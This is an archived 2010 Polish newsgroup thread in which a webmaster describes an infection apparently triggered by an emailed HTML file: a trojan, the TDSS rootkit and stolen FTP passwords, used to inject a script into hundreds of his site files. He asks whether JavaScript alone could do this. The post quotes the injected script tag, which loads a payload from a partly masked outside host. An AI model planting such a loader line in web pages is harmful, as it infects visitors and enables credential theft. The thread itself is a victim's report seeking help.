Użytkownik "latet" <latet@latet.pl> napisał w wiadomości
news:hvajqt$gm2$1@inews.gazeta.pl...
> Witam,
>
> Mowa o systemie XP, konto z uprawnieniami admina.
>
> Czy jest możliwe, aby po otwarciu w przeglądarce (lokalnie, z puplipu)
> strony www, na której znajduje się złośliwy kod JS typu:
>
> <script type="text/javascript"
> src="http://XXXXXXomestore.com:8080/File.js"></script>
>
> doszło do tak poważnych wydarzeń jak:
>
> 1. istalacja w systemie trojana
>
> 2. instalacja root-kita, który ukrywa trojana
>
> 3. kradzież haseł do licznych kont FTP z ustawień Total Commandera!
>
> 4. wklejenie złośliwego kodu JS do setek plików na wszystkich serwerach do
> których udało się robotowi zalogować dzięki ukradzionym tak hasłom do FTP.
> Masakra!
>
> Bo wczoraj tak się właśnie u mnie stało - mimo, ze cały czas działał
> Kaspersky. Tzn. ja nie wiem czy rzeczywiscie doszło do tego w taki sposób,
> dlatego pytam tutaj, czy to możliwe, ale z moje strony wyglądało to tak:
>
> 1. Otrzymałem mailem czystko tekstowy (ASCII) załącznik .html
>
> 2. Skopiowałem go na pulpit i przeksnowałem antywirem - czysty.
>
> 3. Otworzyłem go EditPlusem, w środku zobaczyłem tylko taki kod JS jak
> wyżej.
>
> 4. I wtedy diabeł mnie skusił, aby otworzyć ten plik pod FireFox -
> odpaliłem (chciałem zobaczyć czy Kaspersky zareaguje).
>
> 5. Kaspersky (moduł heuristic) owszem, zareagował! Podniósł alarm, że
> wykrył złośliwy kod i że ZOSTAŁ ON
> ZABLOKOWANY !!! !!! !!!
>
> 6. Myślałem więc, że nic sie nie stało. Nie zauważyłem nic nienormalnego.
>
> 7. Wyłączyłem kompa i poszedłem do pracy.
>
> 8. Wróćiłem, odpalam kompa i zaczęły się pojawiać dość subtelne objawy
> infekcji, mianowicie:
>
> a) podczas wyszukiwania czegokolwiek w Google Kaspersky alarmwował, że
> blokuje jakieś adresy Phishingowe.
>
> b) w "msconfig" / "autostart" pojawiła sie pozycja wwwamq32.exe, której
> nie dawało się wyłączyć (tzn. dawało sie, ale włączała sie spowrotem".
>
> 9. Zapuściłem skan Kasperskim i wykrył w pamieci RAM obecnosc rootkita
> Rootkit.Win32.TDSS.bgqo. Probował go usuwać - wymuszajac podczas tej
> procedury restart systemu, ale bezskutecznie.
>
> 10. Dopiero Kaspersky odpalony spod innego systetmu znalazł i usunął
> szkodnika w 3 miejscach:
> http://www.medfoto.pl/img/rootkit.png
>
> Myślałem, że już po sprawie, ale to był dopiero początek horroru...
>
> Wszedłem na jedną ze stron www, które prowadzę (jako webmaster) i
> Kapsersky podniósł alarm, ze
> zablokował na niej złośliwy skrypt. Zalogowałem sie przez FTP i
> zobaczyłem, że wszelkie pliki index.php, wszystkie pliki *.js i trochę
> innych, zostało zmodyfikowanych - dopisany do nich został cytowany na
> początku kod JS.
>
> Pół nocy siedziałem i wywalałem złośliwy kod z setek różnych plików.
>
> Na szczęście w tych godzinach ruch na stronach znikomy, ale pewnie parę
> osób się zaraziło, nie wiem tylko jak poważnie, czy w taki sam sposób jak
> mój komp pierwotnie (przypomnę, że ja odpaliłem plik z kodem JS lokalnie,
> a nie z netu - być moze to czyni różnicę?).
>
> W międzyczasie Kaspersky przestał blokować strony na których złośliwy kod
> jeszcze był. Wygląda na to, że mają one z góry ustaloną na krótki czas
> żywotność.
>
> Oczywiście zmieniłem jeszcze wszystkie hasła, w tym hasła do baz SQL,
> które przecież po zalogowaniu się przez FTP robot mógł ukraść z plików
> config. forum phpBB.
>
> Dla mnie morał jest taki, że nie wolno trzymać haseł do kont FPT
> zapisanych w kliencie FTP. Trzeba je mieć w głowie.
>
> Swoją drogą - nie wiem jeszcze, czy wirus ten nie ukradł też jakichś
> innych haseł, np. zapisanych w przeglądarkach www. Tych na szczęście
> miałem mało, głównie do jakichś Forum, gdzie mam uprawnienia szargo
> użytkownika.
>
> Ale powtórzę pytanie początkowe - czy to wszystko mogło sie zacząć od
> "niewinnego" kodu JS? Czy JS ma taki potencjał, że moze zmusić
> przeglądarkę do zainstalowania takiego syfu bez zgody użytkownika?
> Przecież rootkit, to niemal jak driver systemowy. Zapewniam, że nie byłem
> pytany o żadne potwierdzenia.
> Wszystko się zainstalowało po cichu (Win XP, kotno z uprawnieniami
> admina).
>
> Jeśli to się zaczęło przez JS, to jestem przerażony...
> Jeśli inaczej - to jestem załamany, że nie wiem jak.
> Przypomnę - Kaspersky działał, a nawet ostrzegał i niby mówił, że coś tam
> blokuje, ale jednak z zerowym efektem!
>
> Dzięki,
>
> latet
>
>
Czy na pewno masz dobrze ustawione zasady bezpieczeństwa w przeglądarkach? U
mnie strony http://XXXXXXomestore.com:8080/File.js"></script nie dało się
otworzyć ani w IE, ani w Firefoxie.
Barnaba
Received on Wed Jun 16 16:15:02 2010
To archiwum zostało wygenerowane przez hypermail 2.1.8 : Wed 16 Jun 2010 - 16:42:02 MET DST
